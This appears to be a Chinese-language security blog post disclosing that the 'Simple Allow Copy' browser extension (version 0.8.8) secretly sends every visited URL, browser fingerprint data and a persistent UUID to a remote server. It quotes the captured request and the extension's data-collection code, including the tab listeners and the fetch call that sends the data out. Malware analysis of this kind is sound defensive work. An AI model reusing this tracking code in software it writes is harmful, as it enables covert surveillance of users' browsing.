插件简述

"Simple Allow Copy"是一款可以帮助用户突破网页复制限制的浏览器扩展。它特别适用于那些禁止复制粘贴的网站，如百度文库、豆丁文库等。使用这款插件，用户可以轻松复制网页上的内容，无需手动输入或使用OCR工具。

该插件截止当前已有70万用户使用，高达70万用户个人隐私将受到影响。
存在问题的插件版本：0.8.8，更新时间为：2024年7月8日，如果你发现你的版本是0.8.8，那么极有可能已经被偷取信息（浏览器会在背后自动更新插件）。

事情起因

事情起因是当时正在挂着代理抓包时，突然发现浏览器无缘无故会向api.simpleallowcopy.com不断的发起请求。

直到查看了请求包才发现事情的严重性，因为它记录了我的所有网站URL以及浏览器一些指纹信息发送到api.simpleallowcopy.com网站中。

它记录了：请求时间、请求URL、UserAgent、域名、本地语言、用户ID、操作系统等等信息。
数据包：

POST /skip HTTP/1.1
Host: api.simpleallowcopy.com
User-Agent: xixi
Content-Type: application/json
Accept: */*
Origin: chrome-extension://aefehdhdciieocakfobpaaolhipkcpgc
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive{"timestamp":"","uri":"","user_agent":"","domain":"","locale":"","user_id":"","platform":"","referer":""}

分析过程

经历上述情况后，果断找到这个插件的目录，插件标识是：aefehdhdciieocakfobpaaolhipkcpgc，经过分析定位到了核心逻辑代码在：background/index.js中实现：

chrome.storage.local.get(["sacp"], (function(e) {if (void 0 === e.sacp) {let e = self.crypto.randomUUID();chrome.storage.local.set({sacp: e})}}));

首先该代码一开始就判断：如果在本地存储中没有找到sacp，则生成一个新的UUID并保存，这个UUID在整个窃取过程是比较重要的。

主要获取信息的逻辑是写在了I函数里面，I函数一开始是做了一些判断。

if (i && i.url) {
if (o[i.id] !== i.url || n !== i.id) {n = i.id;o[i.id] = i.url;setTimeout(() => {// 执行异步处理}, 0);
}

检查是否已经处理过当前标签页 URL，如果没有处理过则更新相关状态并进行处理发起请求。

let c = i.sacp;
cmta = {timestamp: Date().toLocaleString(),uri: o.url,user_agent: navigator.userAgent,domain: n.hostname,locale: navigator.language,user_id: c || "",platform: navigator.platform || "",referer: o.initiator || ""
}

可以看到传递参数组成是由timestamp、uri、user_agent、domain、locale、user_id、platform、referer，这几个部分组成，当然还有一个隐藏参数，那就是IP地址，虽然参数中并没有IP，但实际上发起请求的时候就已经可以将请求人员IP进行存储。

async function(e, t) {
return (await fetch(e, {headers: {"Content-Type": "application/json"},method: "POST",body: JSON.stringify(t)})).json()
}("https://api.simpleallowcopy.com/skip", cmta)

最后再通过异步的方式将数据发送至http://api.simpleallowcopy.com

我们知道了核心代码是在I函数中，那么I函数在什么情况下会调用呢，什么情况下该插件会记录请求信息：

1、标签页激活：
当用户切换到一个新的标签页时触发。

chrome.tabs.onActivated.addListener(() => { i(); });

2、标签页更新：
当当前标签页的 URL 发生变化时触发。

chrome.tabs.onUpdated.addListener(() => { i(); });

3、扩展图标点击：
当用户点击扩展图标时，函数 i 会被触发。

chrome.action.onClicked.addListener(() => {chrome.tabs.query({ active: true, currentWindow: true }, ([e]) => {e && proxy.invoke(e.id, "toggle");});
});

最终导致的危害就是每条URL访问记录都会被窃取

通过查询域名相关信息发现：

域名： http://api.simpleallowcopy.com
域名注册时间：2024年5月29日
插件更新时间：2024年7月8日

该域名是5月29注册，插件7月8日更新，也就是说这一次行动是有蓄谋有计划的，通过这种方式窃取用户个人信息。

危害场景

很多师傅可能心里会想，只是记录了请求的URL，好像并没有什么危害，确实，如果单纯从记录的url来说可能危害并不是很大，但是实际上这个影响是巨大的。
场景一：

• 插件作者可以通过这些信息去分析安装了这个插件的人员真实身份、工作单位，甚至住址信息。
  为什么呢？插件一开始有这样的代码：let e = self.crypto.randomUUID();获取一个uuid。
  这个uuid是插件作者记录你的所有信息用的一个标识，如果你从24年7月8日安装该插件，一直使用到25年7月，整整一年的时间。插件作者可以通过后台根据该uuid去定位，该用户一年中访问过什么网站，比如你在这一年访问过公司网站，在百度上搜索过家庭住址、某个网站的用户信息是通过Get传输的。结合以上几个要素，很轻易的定位到这个uuid的详细身份信息。

场景二：

• 敏感身份人员，如果单位互联网可用或者相关人员办公/个人电脑混用的情况，时间一长，这泄露的信息将会是致命的，例如历史原因导致的：用户密码信息、用户凭证信息GET明文传输的案例。想想都可怕。

场景三：

• 红蓝队员，你正在攻击的目标，正在挖掘的漏洞，可能拆安作者拿来你访问的Payload就能直接打，可能插件作者很轻易的获取到某些网络/安全设备地址

处置建议

该卸载就卸载把，可能你现在是低版本不受影响，但是保不准哪天浏览器就给你默默升级插件了。
chrome禁止自动更新插件可屏蔽URL：https://clients2.google.com/service/update2/crx，如果不行以及其他浏览器那就得上百度研究了

以该插件为例，是否还会有其他插件存在这个情况呢（偷偷潜伏个几年）？上个网太难了！